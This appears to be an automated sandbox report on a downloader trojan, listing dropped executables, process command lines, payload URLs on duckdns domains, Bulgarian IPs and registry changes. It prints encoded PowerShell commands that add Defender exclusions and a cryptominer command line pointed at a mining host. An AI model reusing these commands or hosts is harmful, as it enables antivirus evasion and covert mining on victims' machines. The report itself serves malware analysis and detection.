Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\fdyryi.exe
|
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe
|
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AlgorithmType.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\aspnet_compiler.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fdyryi.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Keywords.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pjmskbbdr.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41po2hem.my2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dfxx40n0.l1j.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hhivkjpp.r5w.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iisdehwr.szc.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_liowm0cl.oxj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n5t3j3ud.m4x.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rkxaqjkf.jli.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tpppzsc3.1p3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_twqyckxm.pyb.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u5xkch25.hne.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xtvbw3dl.00r.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xtx5jlav.1lx.ps1
|
ASCII text, with no line terminators
|
dropped
|
There are 16 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
|
"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe"
|
||
C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
|
"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGIAcgBvAGsAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABLAGUAeQB3AG8AcgBkAHMALgBlAHgAZQA7AA==
|
||
C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe
|
C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe
|
||
C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe
|
"C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGIAcgBvAGsAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABLAGUAeQB3AG8AcgBkAHMALgBlAHgAZQA7AA==
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
|
||
C:\Users\user\AppData\Local\Temp\fdyryi.exe
|
C:\Users\user\AppData\Local\Temp\fdyryi.exe
|
||
C:\Users\user\AppData\Local\Temp\fdyryi.exe
|
"C:\Users\user\AppData\Local\Temp\fdyryi.exe"
|
||
C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe
|
C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGIAcgBvAGsAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE4AYQBtAGUAZABQAGUAcgBtAGkAcwBzAGkAbwBuAFMAZQB0AHMAXABBAGwAZwBvAHIAaQB0AGgAbQBUAHkAcABlAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAIAAtAEYAbwByAGMAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABiAHIAbwBrAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABOAGEAbQBlAGQAUABlAHIAbQBpAHMAcwBpAG8AbgBTAGUAdABzAFwAQQBsAGcAbwByAGkAdABoAG0AVAB5AHAAZQAuAGUAeABlAA==
|
||
C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe
|
C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe
|
||
C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe
|
"C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe"
|
||
C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe
|
"C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
|
||
C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe
|
"C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 91.92.246.62:39005 -u ZEPHYR3aJa7ZSZrgUcNCWyDb7gCYGVrMsacmxB3psE2TXsoq7wsZU1WdWheFCfaKvLCLc4VHzZdzvA8NfmwfW133Smqm93PzMze4T.RIG_CPU
-p x --algo rx/0 --cpu-max-threads-hint=50
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 91.92.246.62:39005 -u ZEPHYR3aJa7ZSZrgUcNCWyDb7gCYGVrMsacmxB3psE2TXsoq7wsZU1WdWheFCfaKvLCLc4VHzZdzvA8NfmwfW133Smqm93PzMze4T.RIG_CPU
-p x --algo rx/0 --cpu-max-threads-hint=50
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 14 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://juytlioojbni.duckdns.org/byfronbypass.html/css/mss/plugin3.dll
|
91.92.246.15
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://juytlioojbni.duckdns.org/byfronbypass.html/css/mss/Gkwyrkfwp.pdf
|
91.92.246.15
|
||
http://juytlioojbni.duckdns.org/byfronbypass.html/css/mss/mirtn.exe
|
91.92.246.15
|
||
http://juytlioojbni.duckdns.org/byfronbypass.html/css/mss/Wsrszrqqkm.vdf
|
91.92.246.15
|
||
http://juytlioojbni.duckdns.org
|
unknown
|
||
https://stackoverflow.com/q/14436606/23354
|
unknown
|
||
https://github.com/mgravell/protobuf-netJ
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd
|
unknown
|
||
https://github.com/mgravell/protobuf-net
|
unknown
|
||
http://schemas.microsoft.c
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://bnfjdbhgo.duckdns.org/byfronbypass.html/css/mss/Uuanez.pdfPDY
|
unknown
|
||
http://schemas.microso
|
unknown
|
||
https://github.com/mgravell/protobuf-neti
|
unknown
|
||
https://stackoverflow.com/q/11564914/23354;
|
unknown
|
||
https://stackoverflow.com/q/2152978/23354
|
unknown
|
||
http://juytlioojbni.duckdns.org/byfronbypass.html/css/mss/Gkwyrkfwp.pdf1Y
|
unknown
|
||
http://bnfjdbhgo.duckdns.org/byfronbypass.html/css/mss/Uuanez.pdf
|
91.92.254.152
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://bnfjdbhgo.duckdns.org
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://bnfjdbhgo.duckdns.org/byfronbypass.html/css/mss/utr32.exe
|
91.92.254.152
|
There are 16 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
bnfjdbhgo.duckdns.org
|
91.92.254.152
|
||
juytlioojbni.duckdns.org
|
91.92.246.15
|
||
miliutyhgdue.duckdns.org
|
91.92.253.47
|
||
bg.microsoft.map.fastly.net
|
199.232.214.172
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
91.92.253.47
|
miliutyhgdue.duckdns.org
|
Bulgaria
|
||
91.92.246.62
|
unknown
|
Bulgaria
|
||
91.92.246.15
|
juytlioojbni.duckdns.org
|
Bulgaria
|
||
91.92.254.152
|
bnfjdbhgo.duckdns.org
|
Bulgaria
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASMANCS
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASMANCS
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\2CA6B225A03FE0F8D9F1
|
2CA6B225A03FE0F8D9F1
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASMANCS
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASMANCS
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\9b6048d01894c73222f12c43ae5e9503
|
dffe8a8e105854fd8f7fee0c03f26e14
|
||
HKEY_CURRENT_USER\SOFTWARE\9b6048d01894c73222f12c43ae5e9503
|
F09CA6523A09C809FF28661ACBD77D06
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASMANCS
|
FileDirectory
|
There are 92 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
2B8B000
|
trusted library allocation
|
page read and write
|
||
34A1000
|
trusted library allocation
|
page read and write
|
||
402000
|
remote allocation
|
page execute and read and write
|
||
2BDF000
|
trusted library allocation
|
page read and write
|
||
1A946430000
|
trusted library section
|
page read and write
|
||
20541A55000
|
trusted library allocation
|
page read and write
|
||
205313C1000
|
trusted library allocation
|
page read and write
|
||
2E0B000
|
trusted library allocation
|
page read and write
|
||
29A74620000
|
trusted library section
|
page read and write
|
||
1B806521000
|
trusted library allocation
|
page read and write
|
||
1A956C49000
|
trusted library allocation
|
page read and write
|
||
205312B0000
|
trusted library section
|
page read and write
|
||
2AFD000
|
trusted library allocation
|
page read and write
|
||
57A0000
|
trusted library section
|
page read and write
|
||
1A956BA9000
|
trusted library allocation
|
page read and write
|
||
459A000
|
trusted library allocation
|
page read and write
|
||
205419DC000
|
trusted library allocation
|
page read and write
|
||
3FC2000
|
trusted library allocation
|
page read and write
|
||
2BCE000
|
trusted library allocation
|
page read and write
|
||
3281000
|
trusted library allocation
|
page read and write
|
||
